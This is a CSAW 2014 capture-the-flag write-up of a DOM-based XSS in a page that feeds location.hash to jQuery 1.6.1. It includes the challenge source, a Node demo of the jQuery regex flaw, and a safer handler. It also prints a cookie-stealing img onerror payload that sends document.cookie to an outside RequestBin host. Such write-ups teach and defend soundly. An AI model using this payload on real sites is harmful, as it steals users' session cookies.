CSAW14 – Hashes (Web 300)

September 24, 2014

Writeup by mooh

Description:

location, location, location
http://54.86.199.163:7878/
Written by ColdHeat

 

Screenshot of the challenge website

 

One of three available pictures

We have a website with three links that show pictures of cats and dogs when we click on them.

There is also a form where we can submit a URL, and a bot will visit it. This sounds like an XSS challenge. First, let's check whether the bot really follows every link it is given. For that I will use the service http://requestb.in/ (the public requestb.in service is no longer available; any HTTP endpoint you control that logs incoming requests does the same job). This is their service description: "RequestBin gives you a URL that will collect requests made to it and let you inspect them in a human-friendly way." So there is no need to set up a web server: just submit a RequestBin URL and look at the results. We got a request from 54.86.199.163 with User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.7 Safari/534.34, i.e. a headless PhantomJS browser, which executes JavaScript on whatever page it opens.

First idea: the link we send is inserted into an HTML page (<a href="...">) and the bot clicks on it. So we would try to break out of the href attribute and inject some JavaScript that exfiltrates the cookie.
But tests with http://requestb.in/1d372eg1?c=bla" and http://requestb.in/1d372eg1?c=bla' are unsuccessful: the single and double quotes arrive verbatim as part of the query string that RequestBin receives, so the URL is not being reflected into an attribute we can break out of.

Another look at the source code [0] shows some JavaScript responsible for showing an image when we click on one of the links. It reads window.location.hash and passes the value straight to $(). That sounds like DOM-based XSS. But window.location.hash always starts with a "#", so with a current jQuery the string would only ever be treated as an ID selector. Lucky for us, the page loads jQuery 1.6.1, which is old enough to be vulnerable: before 1.6.3, jQuery's HTML detection only required that a <tag> appear somewhere in the string, so "#<img ...>" is parsed as HTML and the element is created, and its onerror handler fired, before .show() is even called. Note also that the same two lines run unconditionally on page load, so the bot does not need to click anything: the payload fires as soon as it opens the URL.
So let's put a cookie stealer in the hash:

http://54.86.199.163:7878/#<img src="bla.jpg" onerror="document.location= 'http://requestb.in/1d372eg1?c=' + document.cookie">
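To see exactly why the old jQuery turns the hash into markup, here is an added example (my own code, not part of the challenge or of the original writeup). The two regular expressions are jQuery's own quickExpr from 1.6.1 and 1.6.3 respectively; the classify helper is an assumption of this example that mirrors the decision jQuery's init() makes on a string argument, and hashToId is an assumed hardened replacement for the challenge's handler. Run it with node:

```javascript
// Added example (not part of the original writeup or of the challenge):
// why $(location.hash) is DOM XSS on jQuery 1.6.1 but not on 1.6.3+.

// jQuery 1.6.1: a string is HTML if a <tag> appears anywhere in it, whatever
// it starts with, so "#<img ...>" counts as HTML.
const QUICK_EXPR_1_6_1 = /^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/;

// jQuery 1.6.3 (fix for jQuery bug #9521): a string starting with "#" can
// never be HTML; it is either an #id or an ordinary selector.
const QUICK_EXPR_1_6_3 = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/;

// Assumed helper mirroring jQuery's init(): returns "html" (string is parsed
// into DOM nodes, inline event handlers included), "id" (looked up with
// getElementById) or "selector" (handed to Sizzle).
function classify(quickExpr, selector) {
  let match;
  if (selector.charAt(0) === "<" && selector.charAt(selector.length - 1) === ">" && selector.length >= 3) {
    match = [null, selector, null]; // starts and ends with <>: HTML, no regex needed
  } else {
    match = quickExpr.exec(selector);
  }
  if (match && match[1]) return "html";
  if (match && match[2] !== undefined) return "id";
  return "selector";
}

const classify161 = (s) => classify(QUICK_EXPR_1_6_1, s);
const classify163 = (s) => classify(QUICK_EXPR_1_6_3, s);

// Assumed hardened replacement for the challenge's handler: accept only a
// hash that is a plain element id, and look the element up directly instead
// of feeding the raw hash to $(). Returns the id or null.
function hashToId(hash) {
  const m = /^#([A-Za-z0-9_-]+)$/.exec(hash);
  return m ? m[1] : null;
}
// In the page this would be used as:
//   $(window).bind("hashchange", function () {
//     $(".image").hide();
//     const id = hashToId(window.location.hash);
//     const el = id && document.getElementById(id);
//     if (el) el.style.display = "block";
//   });

// Constructed inputs: a legitimate link target and the writeup's payload.
const SAMPLES = [
  "#bowtie",
  "#<img src=\"bla.jpg\" onerror=\"document.location='http://requestb.in/1d372eg1?c='+document.cookie\">",
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s));
  console.log("  jQuery 1.6.1:", classify161(s), "| jQuery 1.6.3:", classify163(s), "| hashToId:", hashToId(s));
}
```

The payload is classified as HTML by 1.6.1 and as a (malformed) selector by 1.6.3, while "#bowtie" is an id lookup in both; the hardened handler simply rejects anything that is not a bare id, which is what the challenge page should have done.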

We check our RequestBin and voilà, the bot's cookie arrives in the query string:

Querystring:
c: win="flag{these_browser_bots_are_annoying}

[0] Source of the challenge page:

<!DOCTYPE html>
<html>
<head>
 <title>CSAW</title>
 <script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.js"></script>
 <style type="text/css">
 .image {
 display: none;
 }
 img {
 width: 400px;
 }
</style>
</head>
<body>
 <a href="#bowtie">bowtie</a>
 <a href="#fluffy">fluffy</a>
 <a href="#beanie">beanie</a>
<div class="image" id="bowtie"><img src="http://i.imgur.com/C9tanfn.jpg"></div>
 <div class="image" id="fluffy"><img src="http://i.imgur.com/oAdF86F.gif"></div>
 <div class="image" id="beanie"><img src="http://i.imgur.com/Uc738dz.jpg"></div>
<div id="message">
 <p>Send me cool links to images!</p>
 <p>There is a bot that checks these links and he kind of unhappy<p>
 <form method="POST" action="/message">
 <input type="text" name="message">
 <input type="submit">
 </form>
 </div>
</body>
<script type="text/javascript">
 $(window).bind( 'hashchange', function(e) { 
 $('.image').hide()
 tag = window.location.hash
 $(tag).show()
 });
 tag = window.location.hash
 $(tag).show()
</script>
</html>
